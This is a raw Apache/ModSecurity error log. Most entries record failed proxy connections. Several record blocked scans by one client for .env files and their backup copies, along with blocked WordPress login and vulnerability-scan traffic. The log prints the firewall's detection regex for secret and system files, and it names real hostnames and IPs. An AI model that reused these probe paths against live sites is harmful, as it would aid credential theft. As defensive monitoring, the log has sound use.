[Tue May 26 18:54:32.336668 2026] [proxy_http:error] [pid 1036960:tid 1037160] [client 208.84.100.18:15208] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.336767 2026] [proxy:error] [pid 1036960:tid 1037123] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.336813 2026] [proxy_http:error] [pid 1036960:tid 1037123] [client 208.84.100.18:15258] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.336900 2026] [proxy:error] [pid 1036960:tid 1037161] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.336939 2026] [proxy_http:error] [pid 1036960:tid 1037161] [client 208.84.100.18:15222] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.337039 2026] [proxy:error] [pid 1036960:tid 1037211] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.337088 2026] [proxy_http:error] [pid 1036960:tid 1037211] [client 208.84.100.18:15238] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.337528 2026] [proxy:error] [pid 1036960:tid 1037160] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.337570 2026] [proxy_http:error] [pid 1036960:tid 1037160] [client 208.84.100.18:15208] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.337676 2026] [proxy:error] [pid 1036960:tid 1037161] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.337720 2026] [proxy_http:error] [pid 1036960:tid 1037161] [client 208.84.100.18:15222] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.337883 2026] [proxy:error] [pid 1036960:tid 1037178] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.337913 2026] [proxy_http:error] [pid 1036960:tid 1037178] [client 208.84.100.18:15256] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.338015 2026] [proxy:error] [pid 1036960:tid 1037123] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.338059 2026] [proxy_http:error] [pid 1036960:tid 1037123] [client 208.84.100.18:15258] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.338151 2026] [proxy:error] [pid 1036960:tid 1037211] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.338200 2026] [proxy_http:error] [pid 1036960:tid 1037211] [client 208.84.100.18:15238] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.338528 2026] [proxy:error] [pid 1036960:tid 1037178] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.338560 2026] [proxy_http:error] [pid 1036960:tid 1037178] [client 208.84.100.18:15256] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.339405 2026] [proxy:error] [pid 1036960:tid 1037205] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.339441 2026] [proxy_http:error] [pid 1036960:tid 1037205] [client 208.84.100.18:15184] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.340031 2026] [proxy:error] [pid 1036960:tid 1037205] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.340063 2026] [proxy_http:error] [pid 1036960:tid 1037205] [client 208.84.100.18:15184] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.344034 2026] [proxy:error] [pid 1036960:tid 1037109] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.344082 2026] [proxy_http:error] [pid 1036960:tid 1037109] [client 208.84.100.18:15072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.344399 2026] [proxy:error] [pid 1036960:tid 1037152] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.344442 2026] [proxy_http:error] [pid 1036960:tid 1037152] [client 208.84.100.18:15200] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.344945 2026] [proxy:error] [pid 1036960:tid 1037109] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.345001 2026] [proxy_http:error] [pid 1036960:tid 1037109] [client 208.84.100.18:15072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.345152 2026] [proxy:error] [pid 1036960:tid 1037134] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.345229 2026] [proxy_http:error] [pid 1036960:tid 1037134] [client 208.84.100.18:15064] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.345382 2026] [security2:error] [pid 1036960:tid 1037142] [client 208.84.100.18:15014] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/app/.env"] [unique_id "ahWfEIGNKXNii6nttH9ikgAAALk"]
[Tue May 26 18:54:32.345431 2026] [proxy:error] [pid 1036960:tid 1037154] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.345476 2026] [proxy_http:error] [pid 1036960:tid 1037154] [client 208.84.100.18:15132] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.345611 2026] [proxy:error] [pid 1036960:tid 1037118] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.345664 2026] [proxy_http:error] [pid 1036960:tid 1037118] [client 208.84.100.18:15004] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.345761 2026] [proxy:error] [pid 1036960:tid 1037152] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.345804 2026] [proxy_http:error] [pid 1036960:tid 1037152] [client 208.84.100.18:15200] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.345982 2026] [proxy:error] [pid 1036960:tid 1037190] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.346066 2026] [proxy_http:error] [pid 1036960:tid 1037190] [client 208.84.100.18:15092] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.346205 2026] [proxy:error] [pid 1036960:tid 1037147] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.346263 2026] [proxy_http:error] [pid 1036960:tid 1037147] [client 208.84.100.18:15098] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.346367 2026] [proxy:error] [pid 1036960:tid 1037113] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.346423 2026] [proxy_http:error] [pid 1036960:tid 1037113] [client 208.84.100.18:15118] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.346524 2026] [proxy:error] [pid 1036960:tid 1037184] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.346568 2026] [proxy_http:error] [pid 1036960:tid 1037184] [client 208.84.100.18:15138] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.346761 2026] [proxy:error] [pid 1036960:tid 1037118] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.346794 2026] [proxy_http:error] [pid 1036960:tid 1037118] [client 208.84.100.18:15004] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.346942 2026] [proxy:error] [pid 1036960:tid 1037093] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.347001 2026] [security2:error] [pid 1036960:tid 1037199] [client 208.84.100.18:15022] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/backend/.env"] [unique_id "ahWfEIGNKXNii6nttH9imwAAAPI"]
[Tue May 26 18:54:32.347012 2026] [proxy_http:error] [pid 1036960:tid 1037093] [client 208.84.100.18:15148] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.347049 2026] [security2:error] [pid 1036960:tid 1037173] [client 208.84.100.18:15020] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/api/.env"] [unique_id "ahWfEIGNKXNii6nttH9imgAAANg"]
[Tue May 26 18:54:32.347128 2026] [proxy:error] [pid 1036960:tid 1037147] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.347184 2026] [proxy_http:error] [pid 1036960:tid 1037147] [client 208.84.100.18:15098] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.347275 2026] [proxy:error] [pid 1036960:tid 1037134] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.347312 2026] [proxy_http:error] [pid 1036960:tid 1037134] [client 208.84.100.18:15064] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.347417 2026] [proxy:error] [pid 1036960:tid 1037190] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.347463 2026] [proxy_http:error] [pid 1036960:tid 1037190] [client 208.84.100.18:15092] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.347564 2026] [proxy:error] [pid 1036960:tid 1037185] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.347614 2026] [proxy_http:error] [pid 1036960:tid 1037185] [client 208.84.100.18:15106] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.347729 2026] [proxy:error] [pid 1036960:tid 1037099] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.347771 2026] [proxy_http:error] [pid 1036960:tid 1037099] [client 208.84.100.18:15076] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.349175 2026] [proxy:error] [pid 1036960:tid 1037102] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.349219 2026] [proxy_http:error] [pid 1036960:tid 1037102] [client 208.84.100.18:15012] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.349330 2026] [proxy:error] [pid 1036960:tid 1037100] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.349382 2026] [proxy_http:error] [pid 1036960:tid 1037100] [client 208.84.100.18:15036] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.349488 2026] [proxy:error] [pid 1036960:tid 1037113] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.349549 2026] [proxy_http:error] [pid 1036960:tid 1037113] [client 208.84.100.18:15118] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.349664 2026] [proxy:error] [pid 1036960:tid 1037154] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.349704 2026] [proxy_http:error] [pid 1036960:tid 1037154] [client 208.84.100.18:15132] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.349804 2026] [proxy:error] [pid 1036960:tid 1037198] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.349849 2026] [proxy_http:error] [pid 1036960:tid 1037198] [client 208.84.100.18:15052] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.349935 2026] [proxy:error] [pid 1036960:tid 1037093] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.349969 2026] [proxy_http:error] [pid 1036960:tid 1037093] [client 208.84.100.18:15148] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.350184 2026] [proxy:error] [pid 1036960:tid 1037184] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.350231 2026] [proxy_http:error] [pid 1036960:tid 1037184] [client 208.84.100.18:15138] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.350329 2026] [proxy:error] [pid 1036960:tid 1037185] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.350367 2026] [proxy_http:error] [pid 1036960:tid 1037185] [client 208.84.100.18:15106] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.350462 2026] [proxy:error] [pid 1036960:tid 1037099] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.350525 2026] [proxy_http:error] [pid 1036960:tid 1037099] [client 208.84.100.18:15076] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.350647 2026] [proxy:error] [pid 1036960:tid 1037100] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.350691 2026] [proxy_http:error] [pid 1036960:tid 1037100] [client 208.84.100.18:15036] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.350769 2026] [proxy:error] [pid 1036960:tid 1037109] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.350818 2026] [proxy_http:error] [pid 1036960:tid 1037109] [client 208.84.100.18:14988] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.350991 2026] [proxy:error] [pid 1036960:tid 1037165] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.351026 2026] [proxy_http:error] [pid 1036960:tid 1037165] [client 208.84.100.18:15176] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.351337 2026] [proxy:error] [pid 1036960:tid 1037139] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.351423 2026] [proxy_http:error] [pid 1036960:tid 1037139] [client 208.84.100.18:15166] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.351507 2026] [proxy:error] [pid 1036960:tid 1037181] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.351555 2026] [proxy_http:error] [pid 1036960:tid 1037181] [client 208.84.100.18:15034] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.351663 2026] [proxy:error] [pid 1036960:tid 1037198] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.351702 2026] [proxy_http:error] [pid 1036960:tid 1037198] [client 208.84.100.18:15052] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.351783 2026] [proxy:error] [pid 1036960:tid 1037109] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.351836 2026] [proxy_http:error] [pid 1036960:tid 1037109] [client 208.84.100.18:14988] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.352033 2026] [proxy:error] [pid 1036960:tid 1037102] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.352076 2026] [proxy_http:error] [pid 1036960:tid 1037102] [client 208.84.100.18:15012] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.352173 2026] [proxy:error] [pid 1036960:tid 1037165] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.352209 2026] [proxy_http:error] [pid 1036960:tid 1037165] [client 208.84.100.18:15176] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.352267 2026] [proxy:error] [pid 1036960:tid 1037156] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.352292 2026] [proxy_http:error] [pid 1036960:tid 1037156] [client 208.84.100.18:15164] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.352379 2026] [proxy:error] [pid 1036960:tid 1037181] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.352419 2026] [proxy_http:error] [pid 1036960:tid 1037181] [client 208.84.100.18:15034] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.352646 2026] [proxy:error] [pid 1036960:tid 1037139] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.352721 2026] [proxy_http:error] [pid 1036960:tid 1037139] [client 208.84.100.18:15166] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.352894 2026] [proxy:error] [pid 1036960:tid 1037156] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.352926 2026] [proxy_http:error] [pid 1036960:tid 1037156] [client 208.84.100.18:15164] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.353178 2026] [security2:error] [pid 1036960:tid 1037092] [client 208.84.100.18:15000] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahWfEIGNKXNii6nttH9iogAAAIc"]
[Tue May 26 18:54:32.987333 2026] [security2:error] [pid 1036960:tid 1037024] [remote 95.217.78.234:39960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.78.217.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWfEIGNKXNii6nttH9irAAAwD8"]
[Tue May 26 18:54:33.464616 2026] [security2:error] [pid 1036960:tid 1037029] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfEYGNKXNii6nttH9iwgAA90Q"]
[Tue May 26 18:54:33.464820 2026] [security2:error] [pid 1036960:tid 1037204] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfEYGNKXNii6nttH9iwgAA90Q"]
[Tue May 26 18:54:33.627876 2026] [security2:error] [pid 1036960:tid 1037193] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfEYGNKXNii6nttH9iuwAAAOw"]
[Tue May 26 18:54:35.729503 2026] [proxy:error] [pid 1036960:tid 1037094] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:35.729577 2026] [proxy_http:error] [pid 1036960:tid 1037094] [client 208.84.100.18:15014] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:35.730182 2026] [proxy:error] [pid 1036960:tid 1037094] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:35.730216 2026] [proxy_http:error] [pid 1036960:tid 1037094] [client 208.84.100.18:15014] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:35.884284 2026] [security2:error] [pid 1036960:tid 1037150] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfE4GNKXNii6nttH9i7gAAAME"]
[Tue May 26 18:54:35.923355 2026] [security2:error] [pid 1036960:tid 1037035] [remote 74.7.241.58:36708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWfE4GNKXNii6nttH9i9gAAlko"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/mailchimp-for-wp/integrations/ninja-forms
[Tue May 26 18:54:36.708686 2026] [security2:error] [pid 1036960:tid 1037045] [remote 95.217.78.234:39960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.78.217.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWfFIGNKXNii6nttH9jBgAAoVQ"], referer: https://atreegroup.com/wp-login.php
[Tue May 26 18:54:36.733029 2026] [proxy:error] [pid 1036960:tid 1037100] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:36.733032 2026] [security2:error] [pid 1036960:tid 1037205] [client 208.84.100.18:15022] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.production.copy"] [unique_id "ahWfFIGNKXNii6nttH9jBwAAAPg"]
[Tue May 26 18:54:36.733095 2026] [proxy_http:error] [pid 1036960:tid 1037100] [client 208.84.100.18:15000] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:36.733279 2026] [proxy:error] [pid 1036960:tid 1037099] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:36.733356 2026] [proxy_http:error] [pid 1036960:tid 1037099] [client 208.84.100.18:15020] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:36.733704 2026] [proxy:error] [pid 1036960:tid 1037100] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:36.733737 2026] [proxy_http:error] [pid 1036960:tid 1037100] [client 208.84.100.18:15000] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:36.734084 2026] [proxy:error] [pid 1036960:tid 1037099] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:36.734180 2026] [proxy_http:error] [pid 1036960:tid 1037099] [client 208.84.100.18:15020] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:38.335604 2026] [security2:error] [pid 1036960:tid 1037200] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfFYGNKXNii6nttH9jMQAAAPM"]
[Tue May 26 18:54:39.522018 2026] [security2:error] [pid 1036960:tid 1037184] [client 208.84.100.18:18614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.local.swp"] [unique_id "ahWfF4GNKXNii6nttH9jVAAAAOM"]
[Tue May 26 18:54:39.522146 2026] [security2:error] [pid 1036960:tid 1037109] [client 208.84.100.18:18674] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcontacts.eco-green.com.mx"] [uri "/___proxy_subdomain_cpcontacts/.env.production.orig"] [unique_id "ahWfF4GNKXNii6nttH9jUgAAAJg"]
